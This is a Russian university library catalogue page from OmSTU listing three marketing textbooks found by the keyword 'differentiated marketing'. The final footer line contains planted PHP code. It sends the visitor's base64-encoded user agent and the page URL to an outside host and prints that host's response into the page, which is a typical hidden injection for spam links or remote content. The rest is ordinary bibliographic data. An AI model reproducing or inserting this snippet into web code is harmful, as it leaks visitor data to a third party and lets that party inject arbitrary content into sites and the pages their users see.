Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

99 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Маркетинг дифференцированный")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 3
1. 
Федько В. П. Основы маркетинга [Текст] : учеб. пособие для студ. вузов / В. П. Федько, Н. Г. Федько, 2005. - 476 с.
Ключевые слова 
ИССЛЕДОВАНИЕ МАРКЕТИНГОВОЕ -- ИНФОРМАЦИЯ МАРКЕТИНГОВАЯ -- БЕНЧМАРКИНГ -- СЕГМЕНТАЦИЯ РЫНКА -- ПОЗИЦИОНИРОВАНИЕ -- КОНЪЮНКТУРА РЫНКА -- брендинг -- ТОВАР -- ЦИКЛ ЖИЗНЕННЫЙ -- УСЛУГИ -- АССОРТИМЕНТ товарный -- ПОЛИТИКА ТОВАРНАЯ -- КОНКУРЕНЦИЯ -- ПОВЕДЕНИЕ ПОКУПАТЕЛЯ -- СТРАТЕГИЯ МАРКЕТИНГОВАЯ -- МАРКЕТИНГ ДИФФЕРЕНЦИРОВАННЫЙ -- МАРКЕТИНГ массовый -- Матрица И. Ансоффа -- модель портера -- Матрица БКГ -- ДИВЕРСИФИКАЦИЯ -- УПРАВЛЕНИЕ РИСКАМИ - Маркетинг -- ПОВЕДЕНИЕ ПОТРЕБИТЕЛЬСКОЕ -- МОТИВАЦИЯ потребителя -- МАРКЕТИНГ - ПРЕДПРИЯТИЕ -- КОНТРОЛЛИНГ -- БЮДЖЕТ МАРКЕТИНГА -- ПЛАНИРОВАНИЕ МАРКЕТИНГА -- SWOT - анализ -- РЕАЛИЗАЦИЯ ТОВАРА -- ТОВАРОДВИЖЕНИЕ -- ТОРГОВЛЯ ОПТОВАЯ -- ПОСРЕДНИК оптовый -- СБЫТ товара -- ТОРГОВЛЯ РОЗНИЧНАЯ -- ТОРГОВЫЙ ДОМ -- АУКЦИОН -- Маркетинг прямой -- СЕРВИС -- КОММУНИКАЦИЯ МАРКЕТИНГОВАЯ -- ПАБЛИК РИЛЕЙШНЗ -- РЕКЛАМА -- Компания рекламная международная -- ЯРМАРКА -выставка -- СТИЛЬ ФИРМЕННЫЙ -- ИМИДЖ ФИРМЫ -- ПОЛИТИКА ЦЕНОВАЯ -- ЦЕНООБРАЗОВАНИЕ -- Marketing - mix
Держатели документа (Информация об экземплярах) 
2. 
Траут Д. Дифференцируйся или умирай! [Текст] : Выживание в эпоху убийственной конкуренции / Д. Траут, С. Ривкин , 2003. - 223 с.
Держатели документа (Информация об экземплярах) 
3. 
Мурахтанова Н. М. Маркетинг [Текст] : Учеб. пособие для студ. учреждений сред. проф. образования / Н. М. Мурахтанова, Е. И. Еремина, 2002. - 208 с.
Ключевые слова 
РЫНОК -- КОНЪЮНКТУРА РЫНКА -- Маркетинг целевой -- Маркетинг дифференцированный -- Маркетинг недифференцированный -- СЕГМЕНТАЦИЯ РЫНКА -- ТОВАР -- Маркетинг практический -- ПОЛИТИКА ТОВАРНАЯ -- ПОЛИТИКА АССОРТИМЕНТНАЯ -- ПОЛИТИКА ИННОВАЦИОННАЯ -- АССОРТИМЕНТ -- ЦЕНА -- ЦЕНООБРАЗОВАНИЕ -- РЕАЛИЗАЦИЯ ТОВАРА -- СБЫТ -- Политика сбытовая -- ПОЛИТИКА коммуникационная -- РЕКЛАМА -- Продажа прямая -- Политика сервисная -- РЕКЛАМА - ПРАВО -- ЯРМАРКА -- ВЫСТАВКА -- СТИЛЬ фирменный -- ЗНАК ТОВАРНЫЙ -- УПАКОВКА -- МАРКИРОВКА -- ПЛАНИРОВАНИЕ СТРАТЕГИЧЕСКОЕ -- ПРОГРАММА маркетинговая -- СИСТЕМА ИНФОРМАЦИОННАЯ маркетинговая -- СТРАТЕГИЯ МАРКЕТИНГОВАЯ -- ИССЛЕДОВАНИЕ МАРКЕТИНГОВОЕ
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3148 - 22.01.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.59 с.12 запросов, 0.42c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;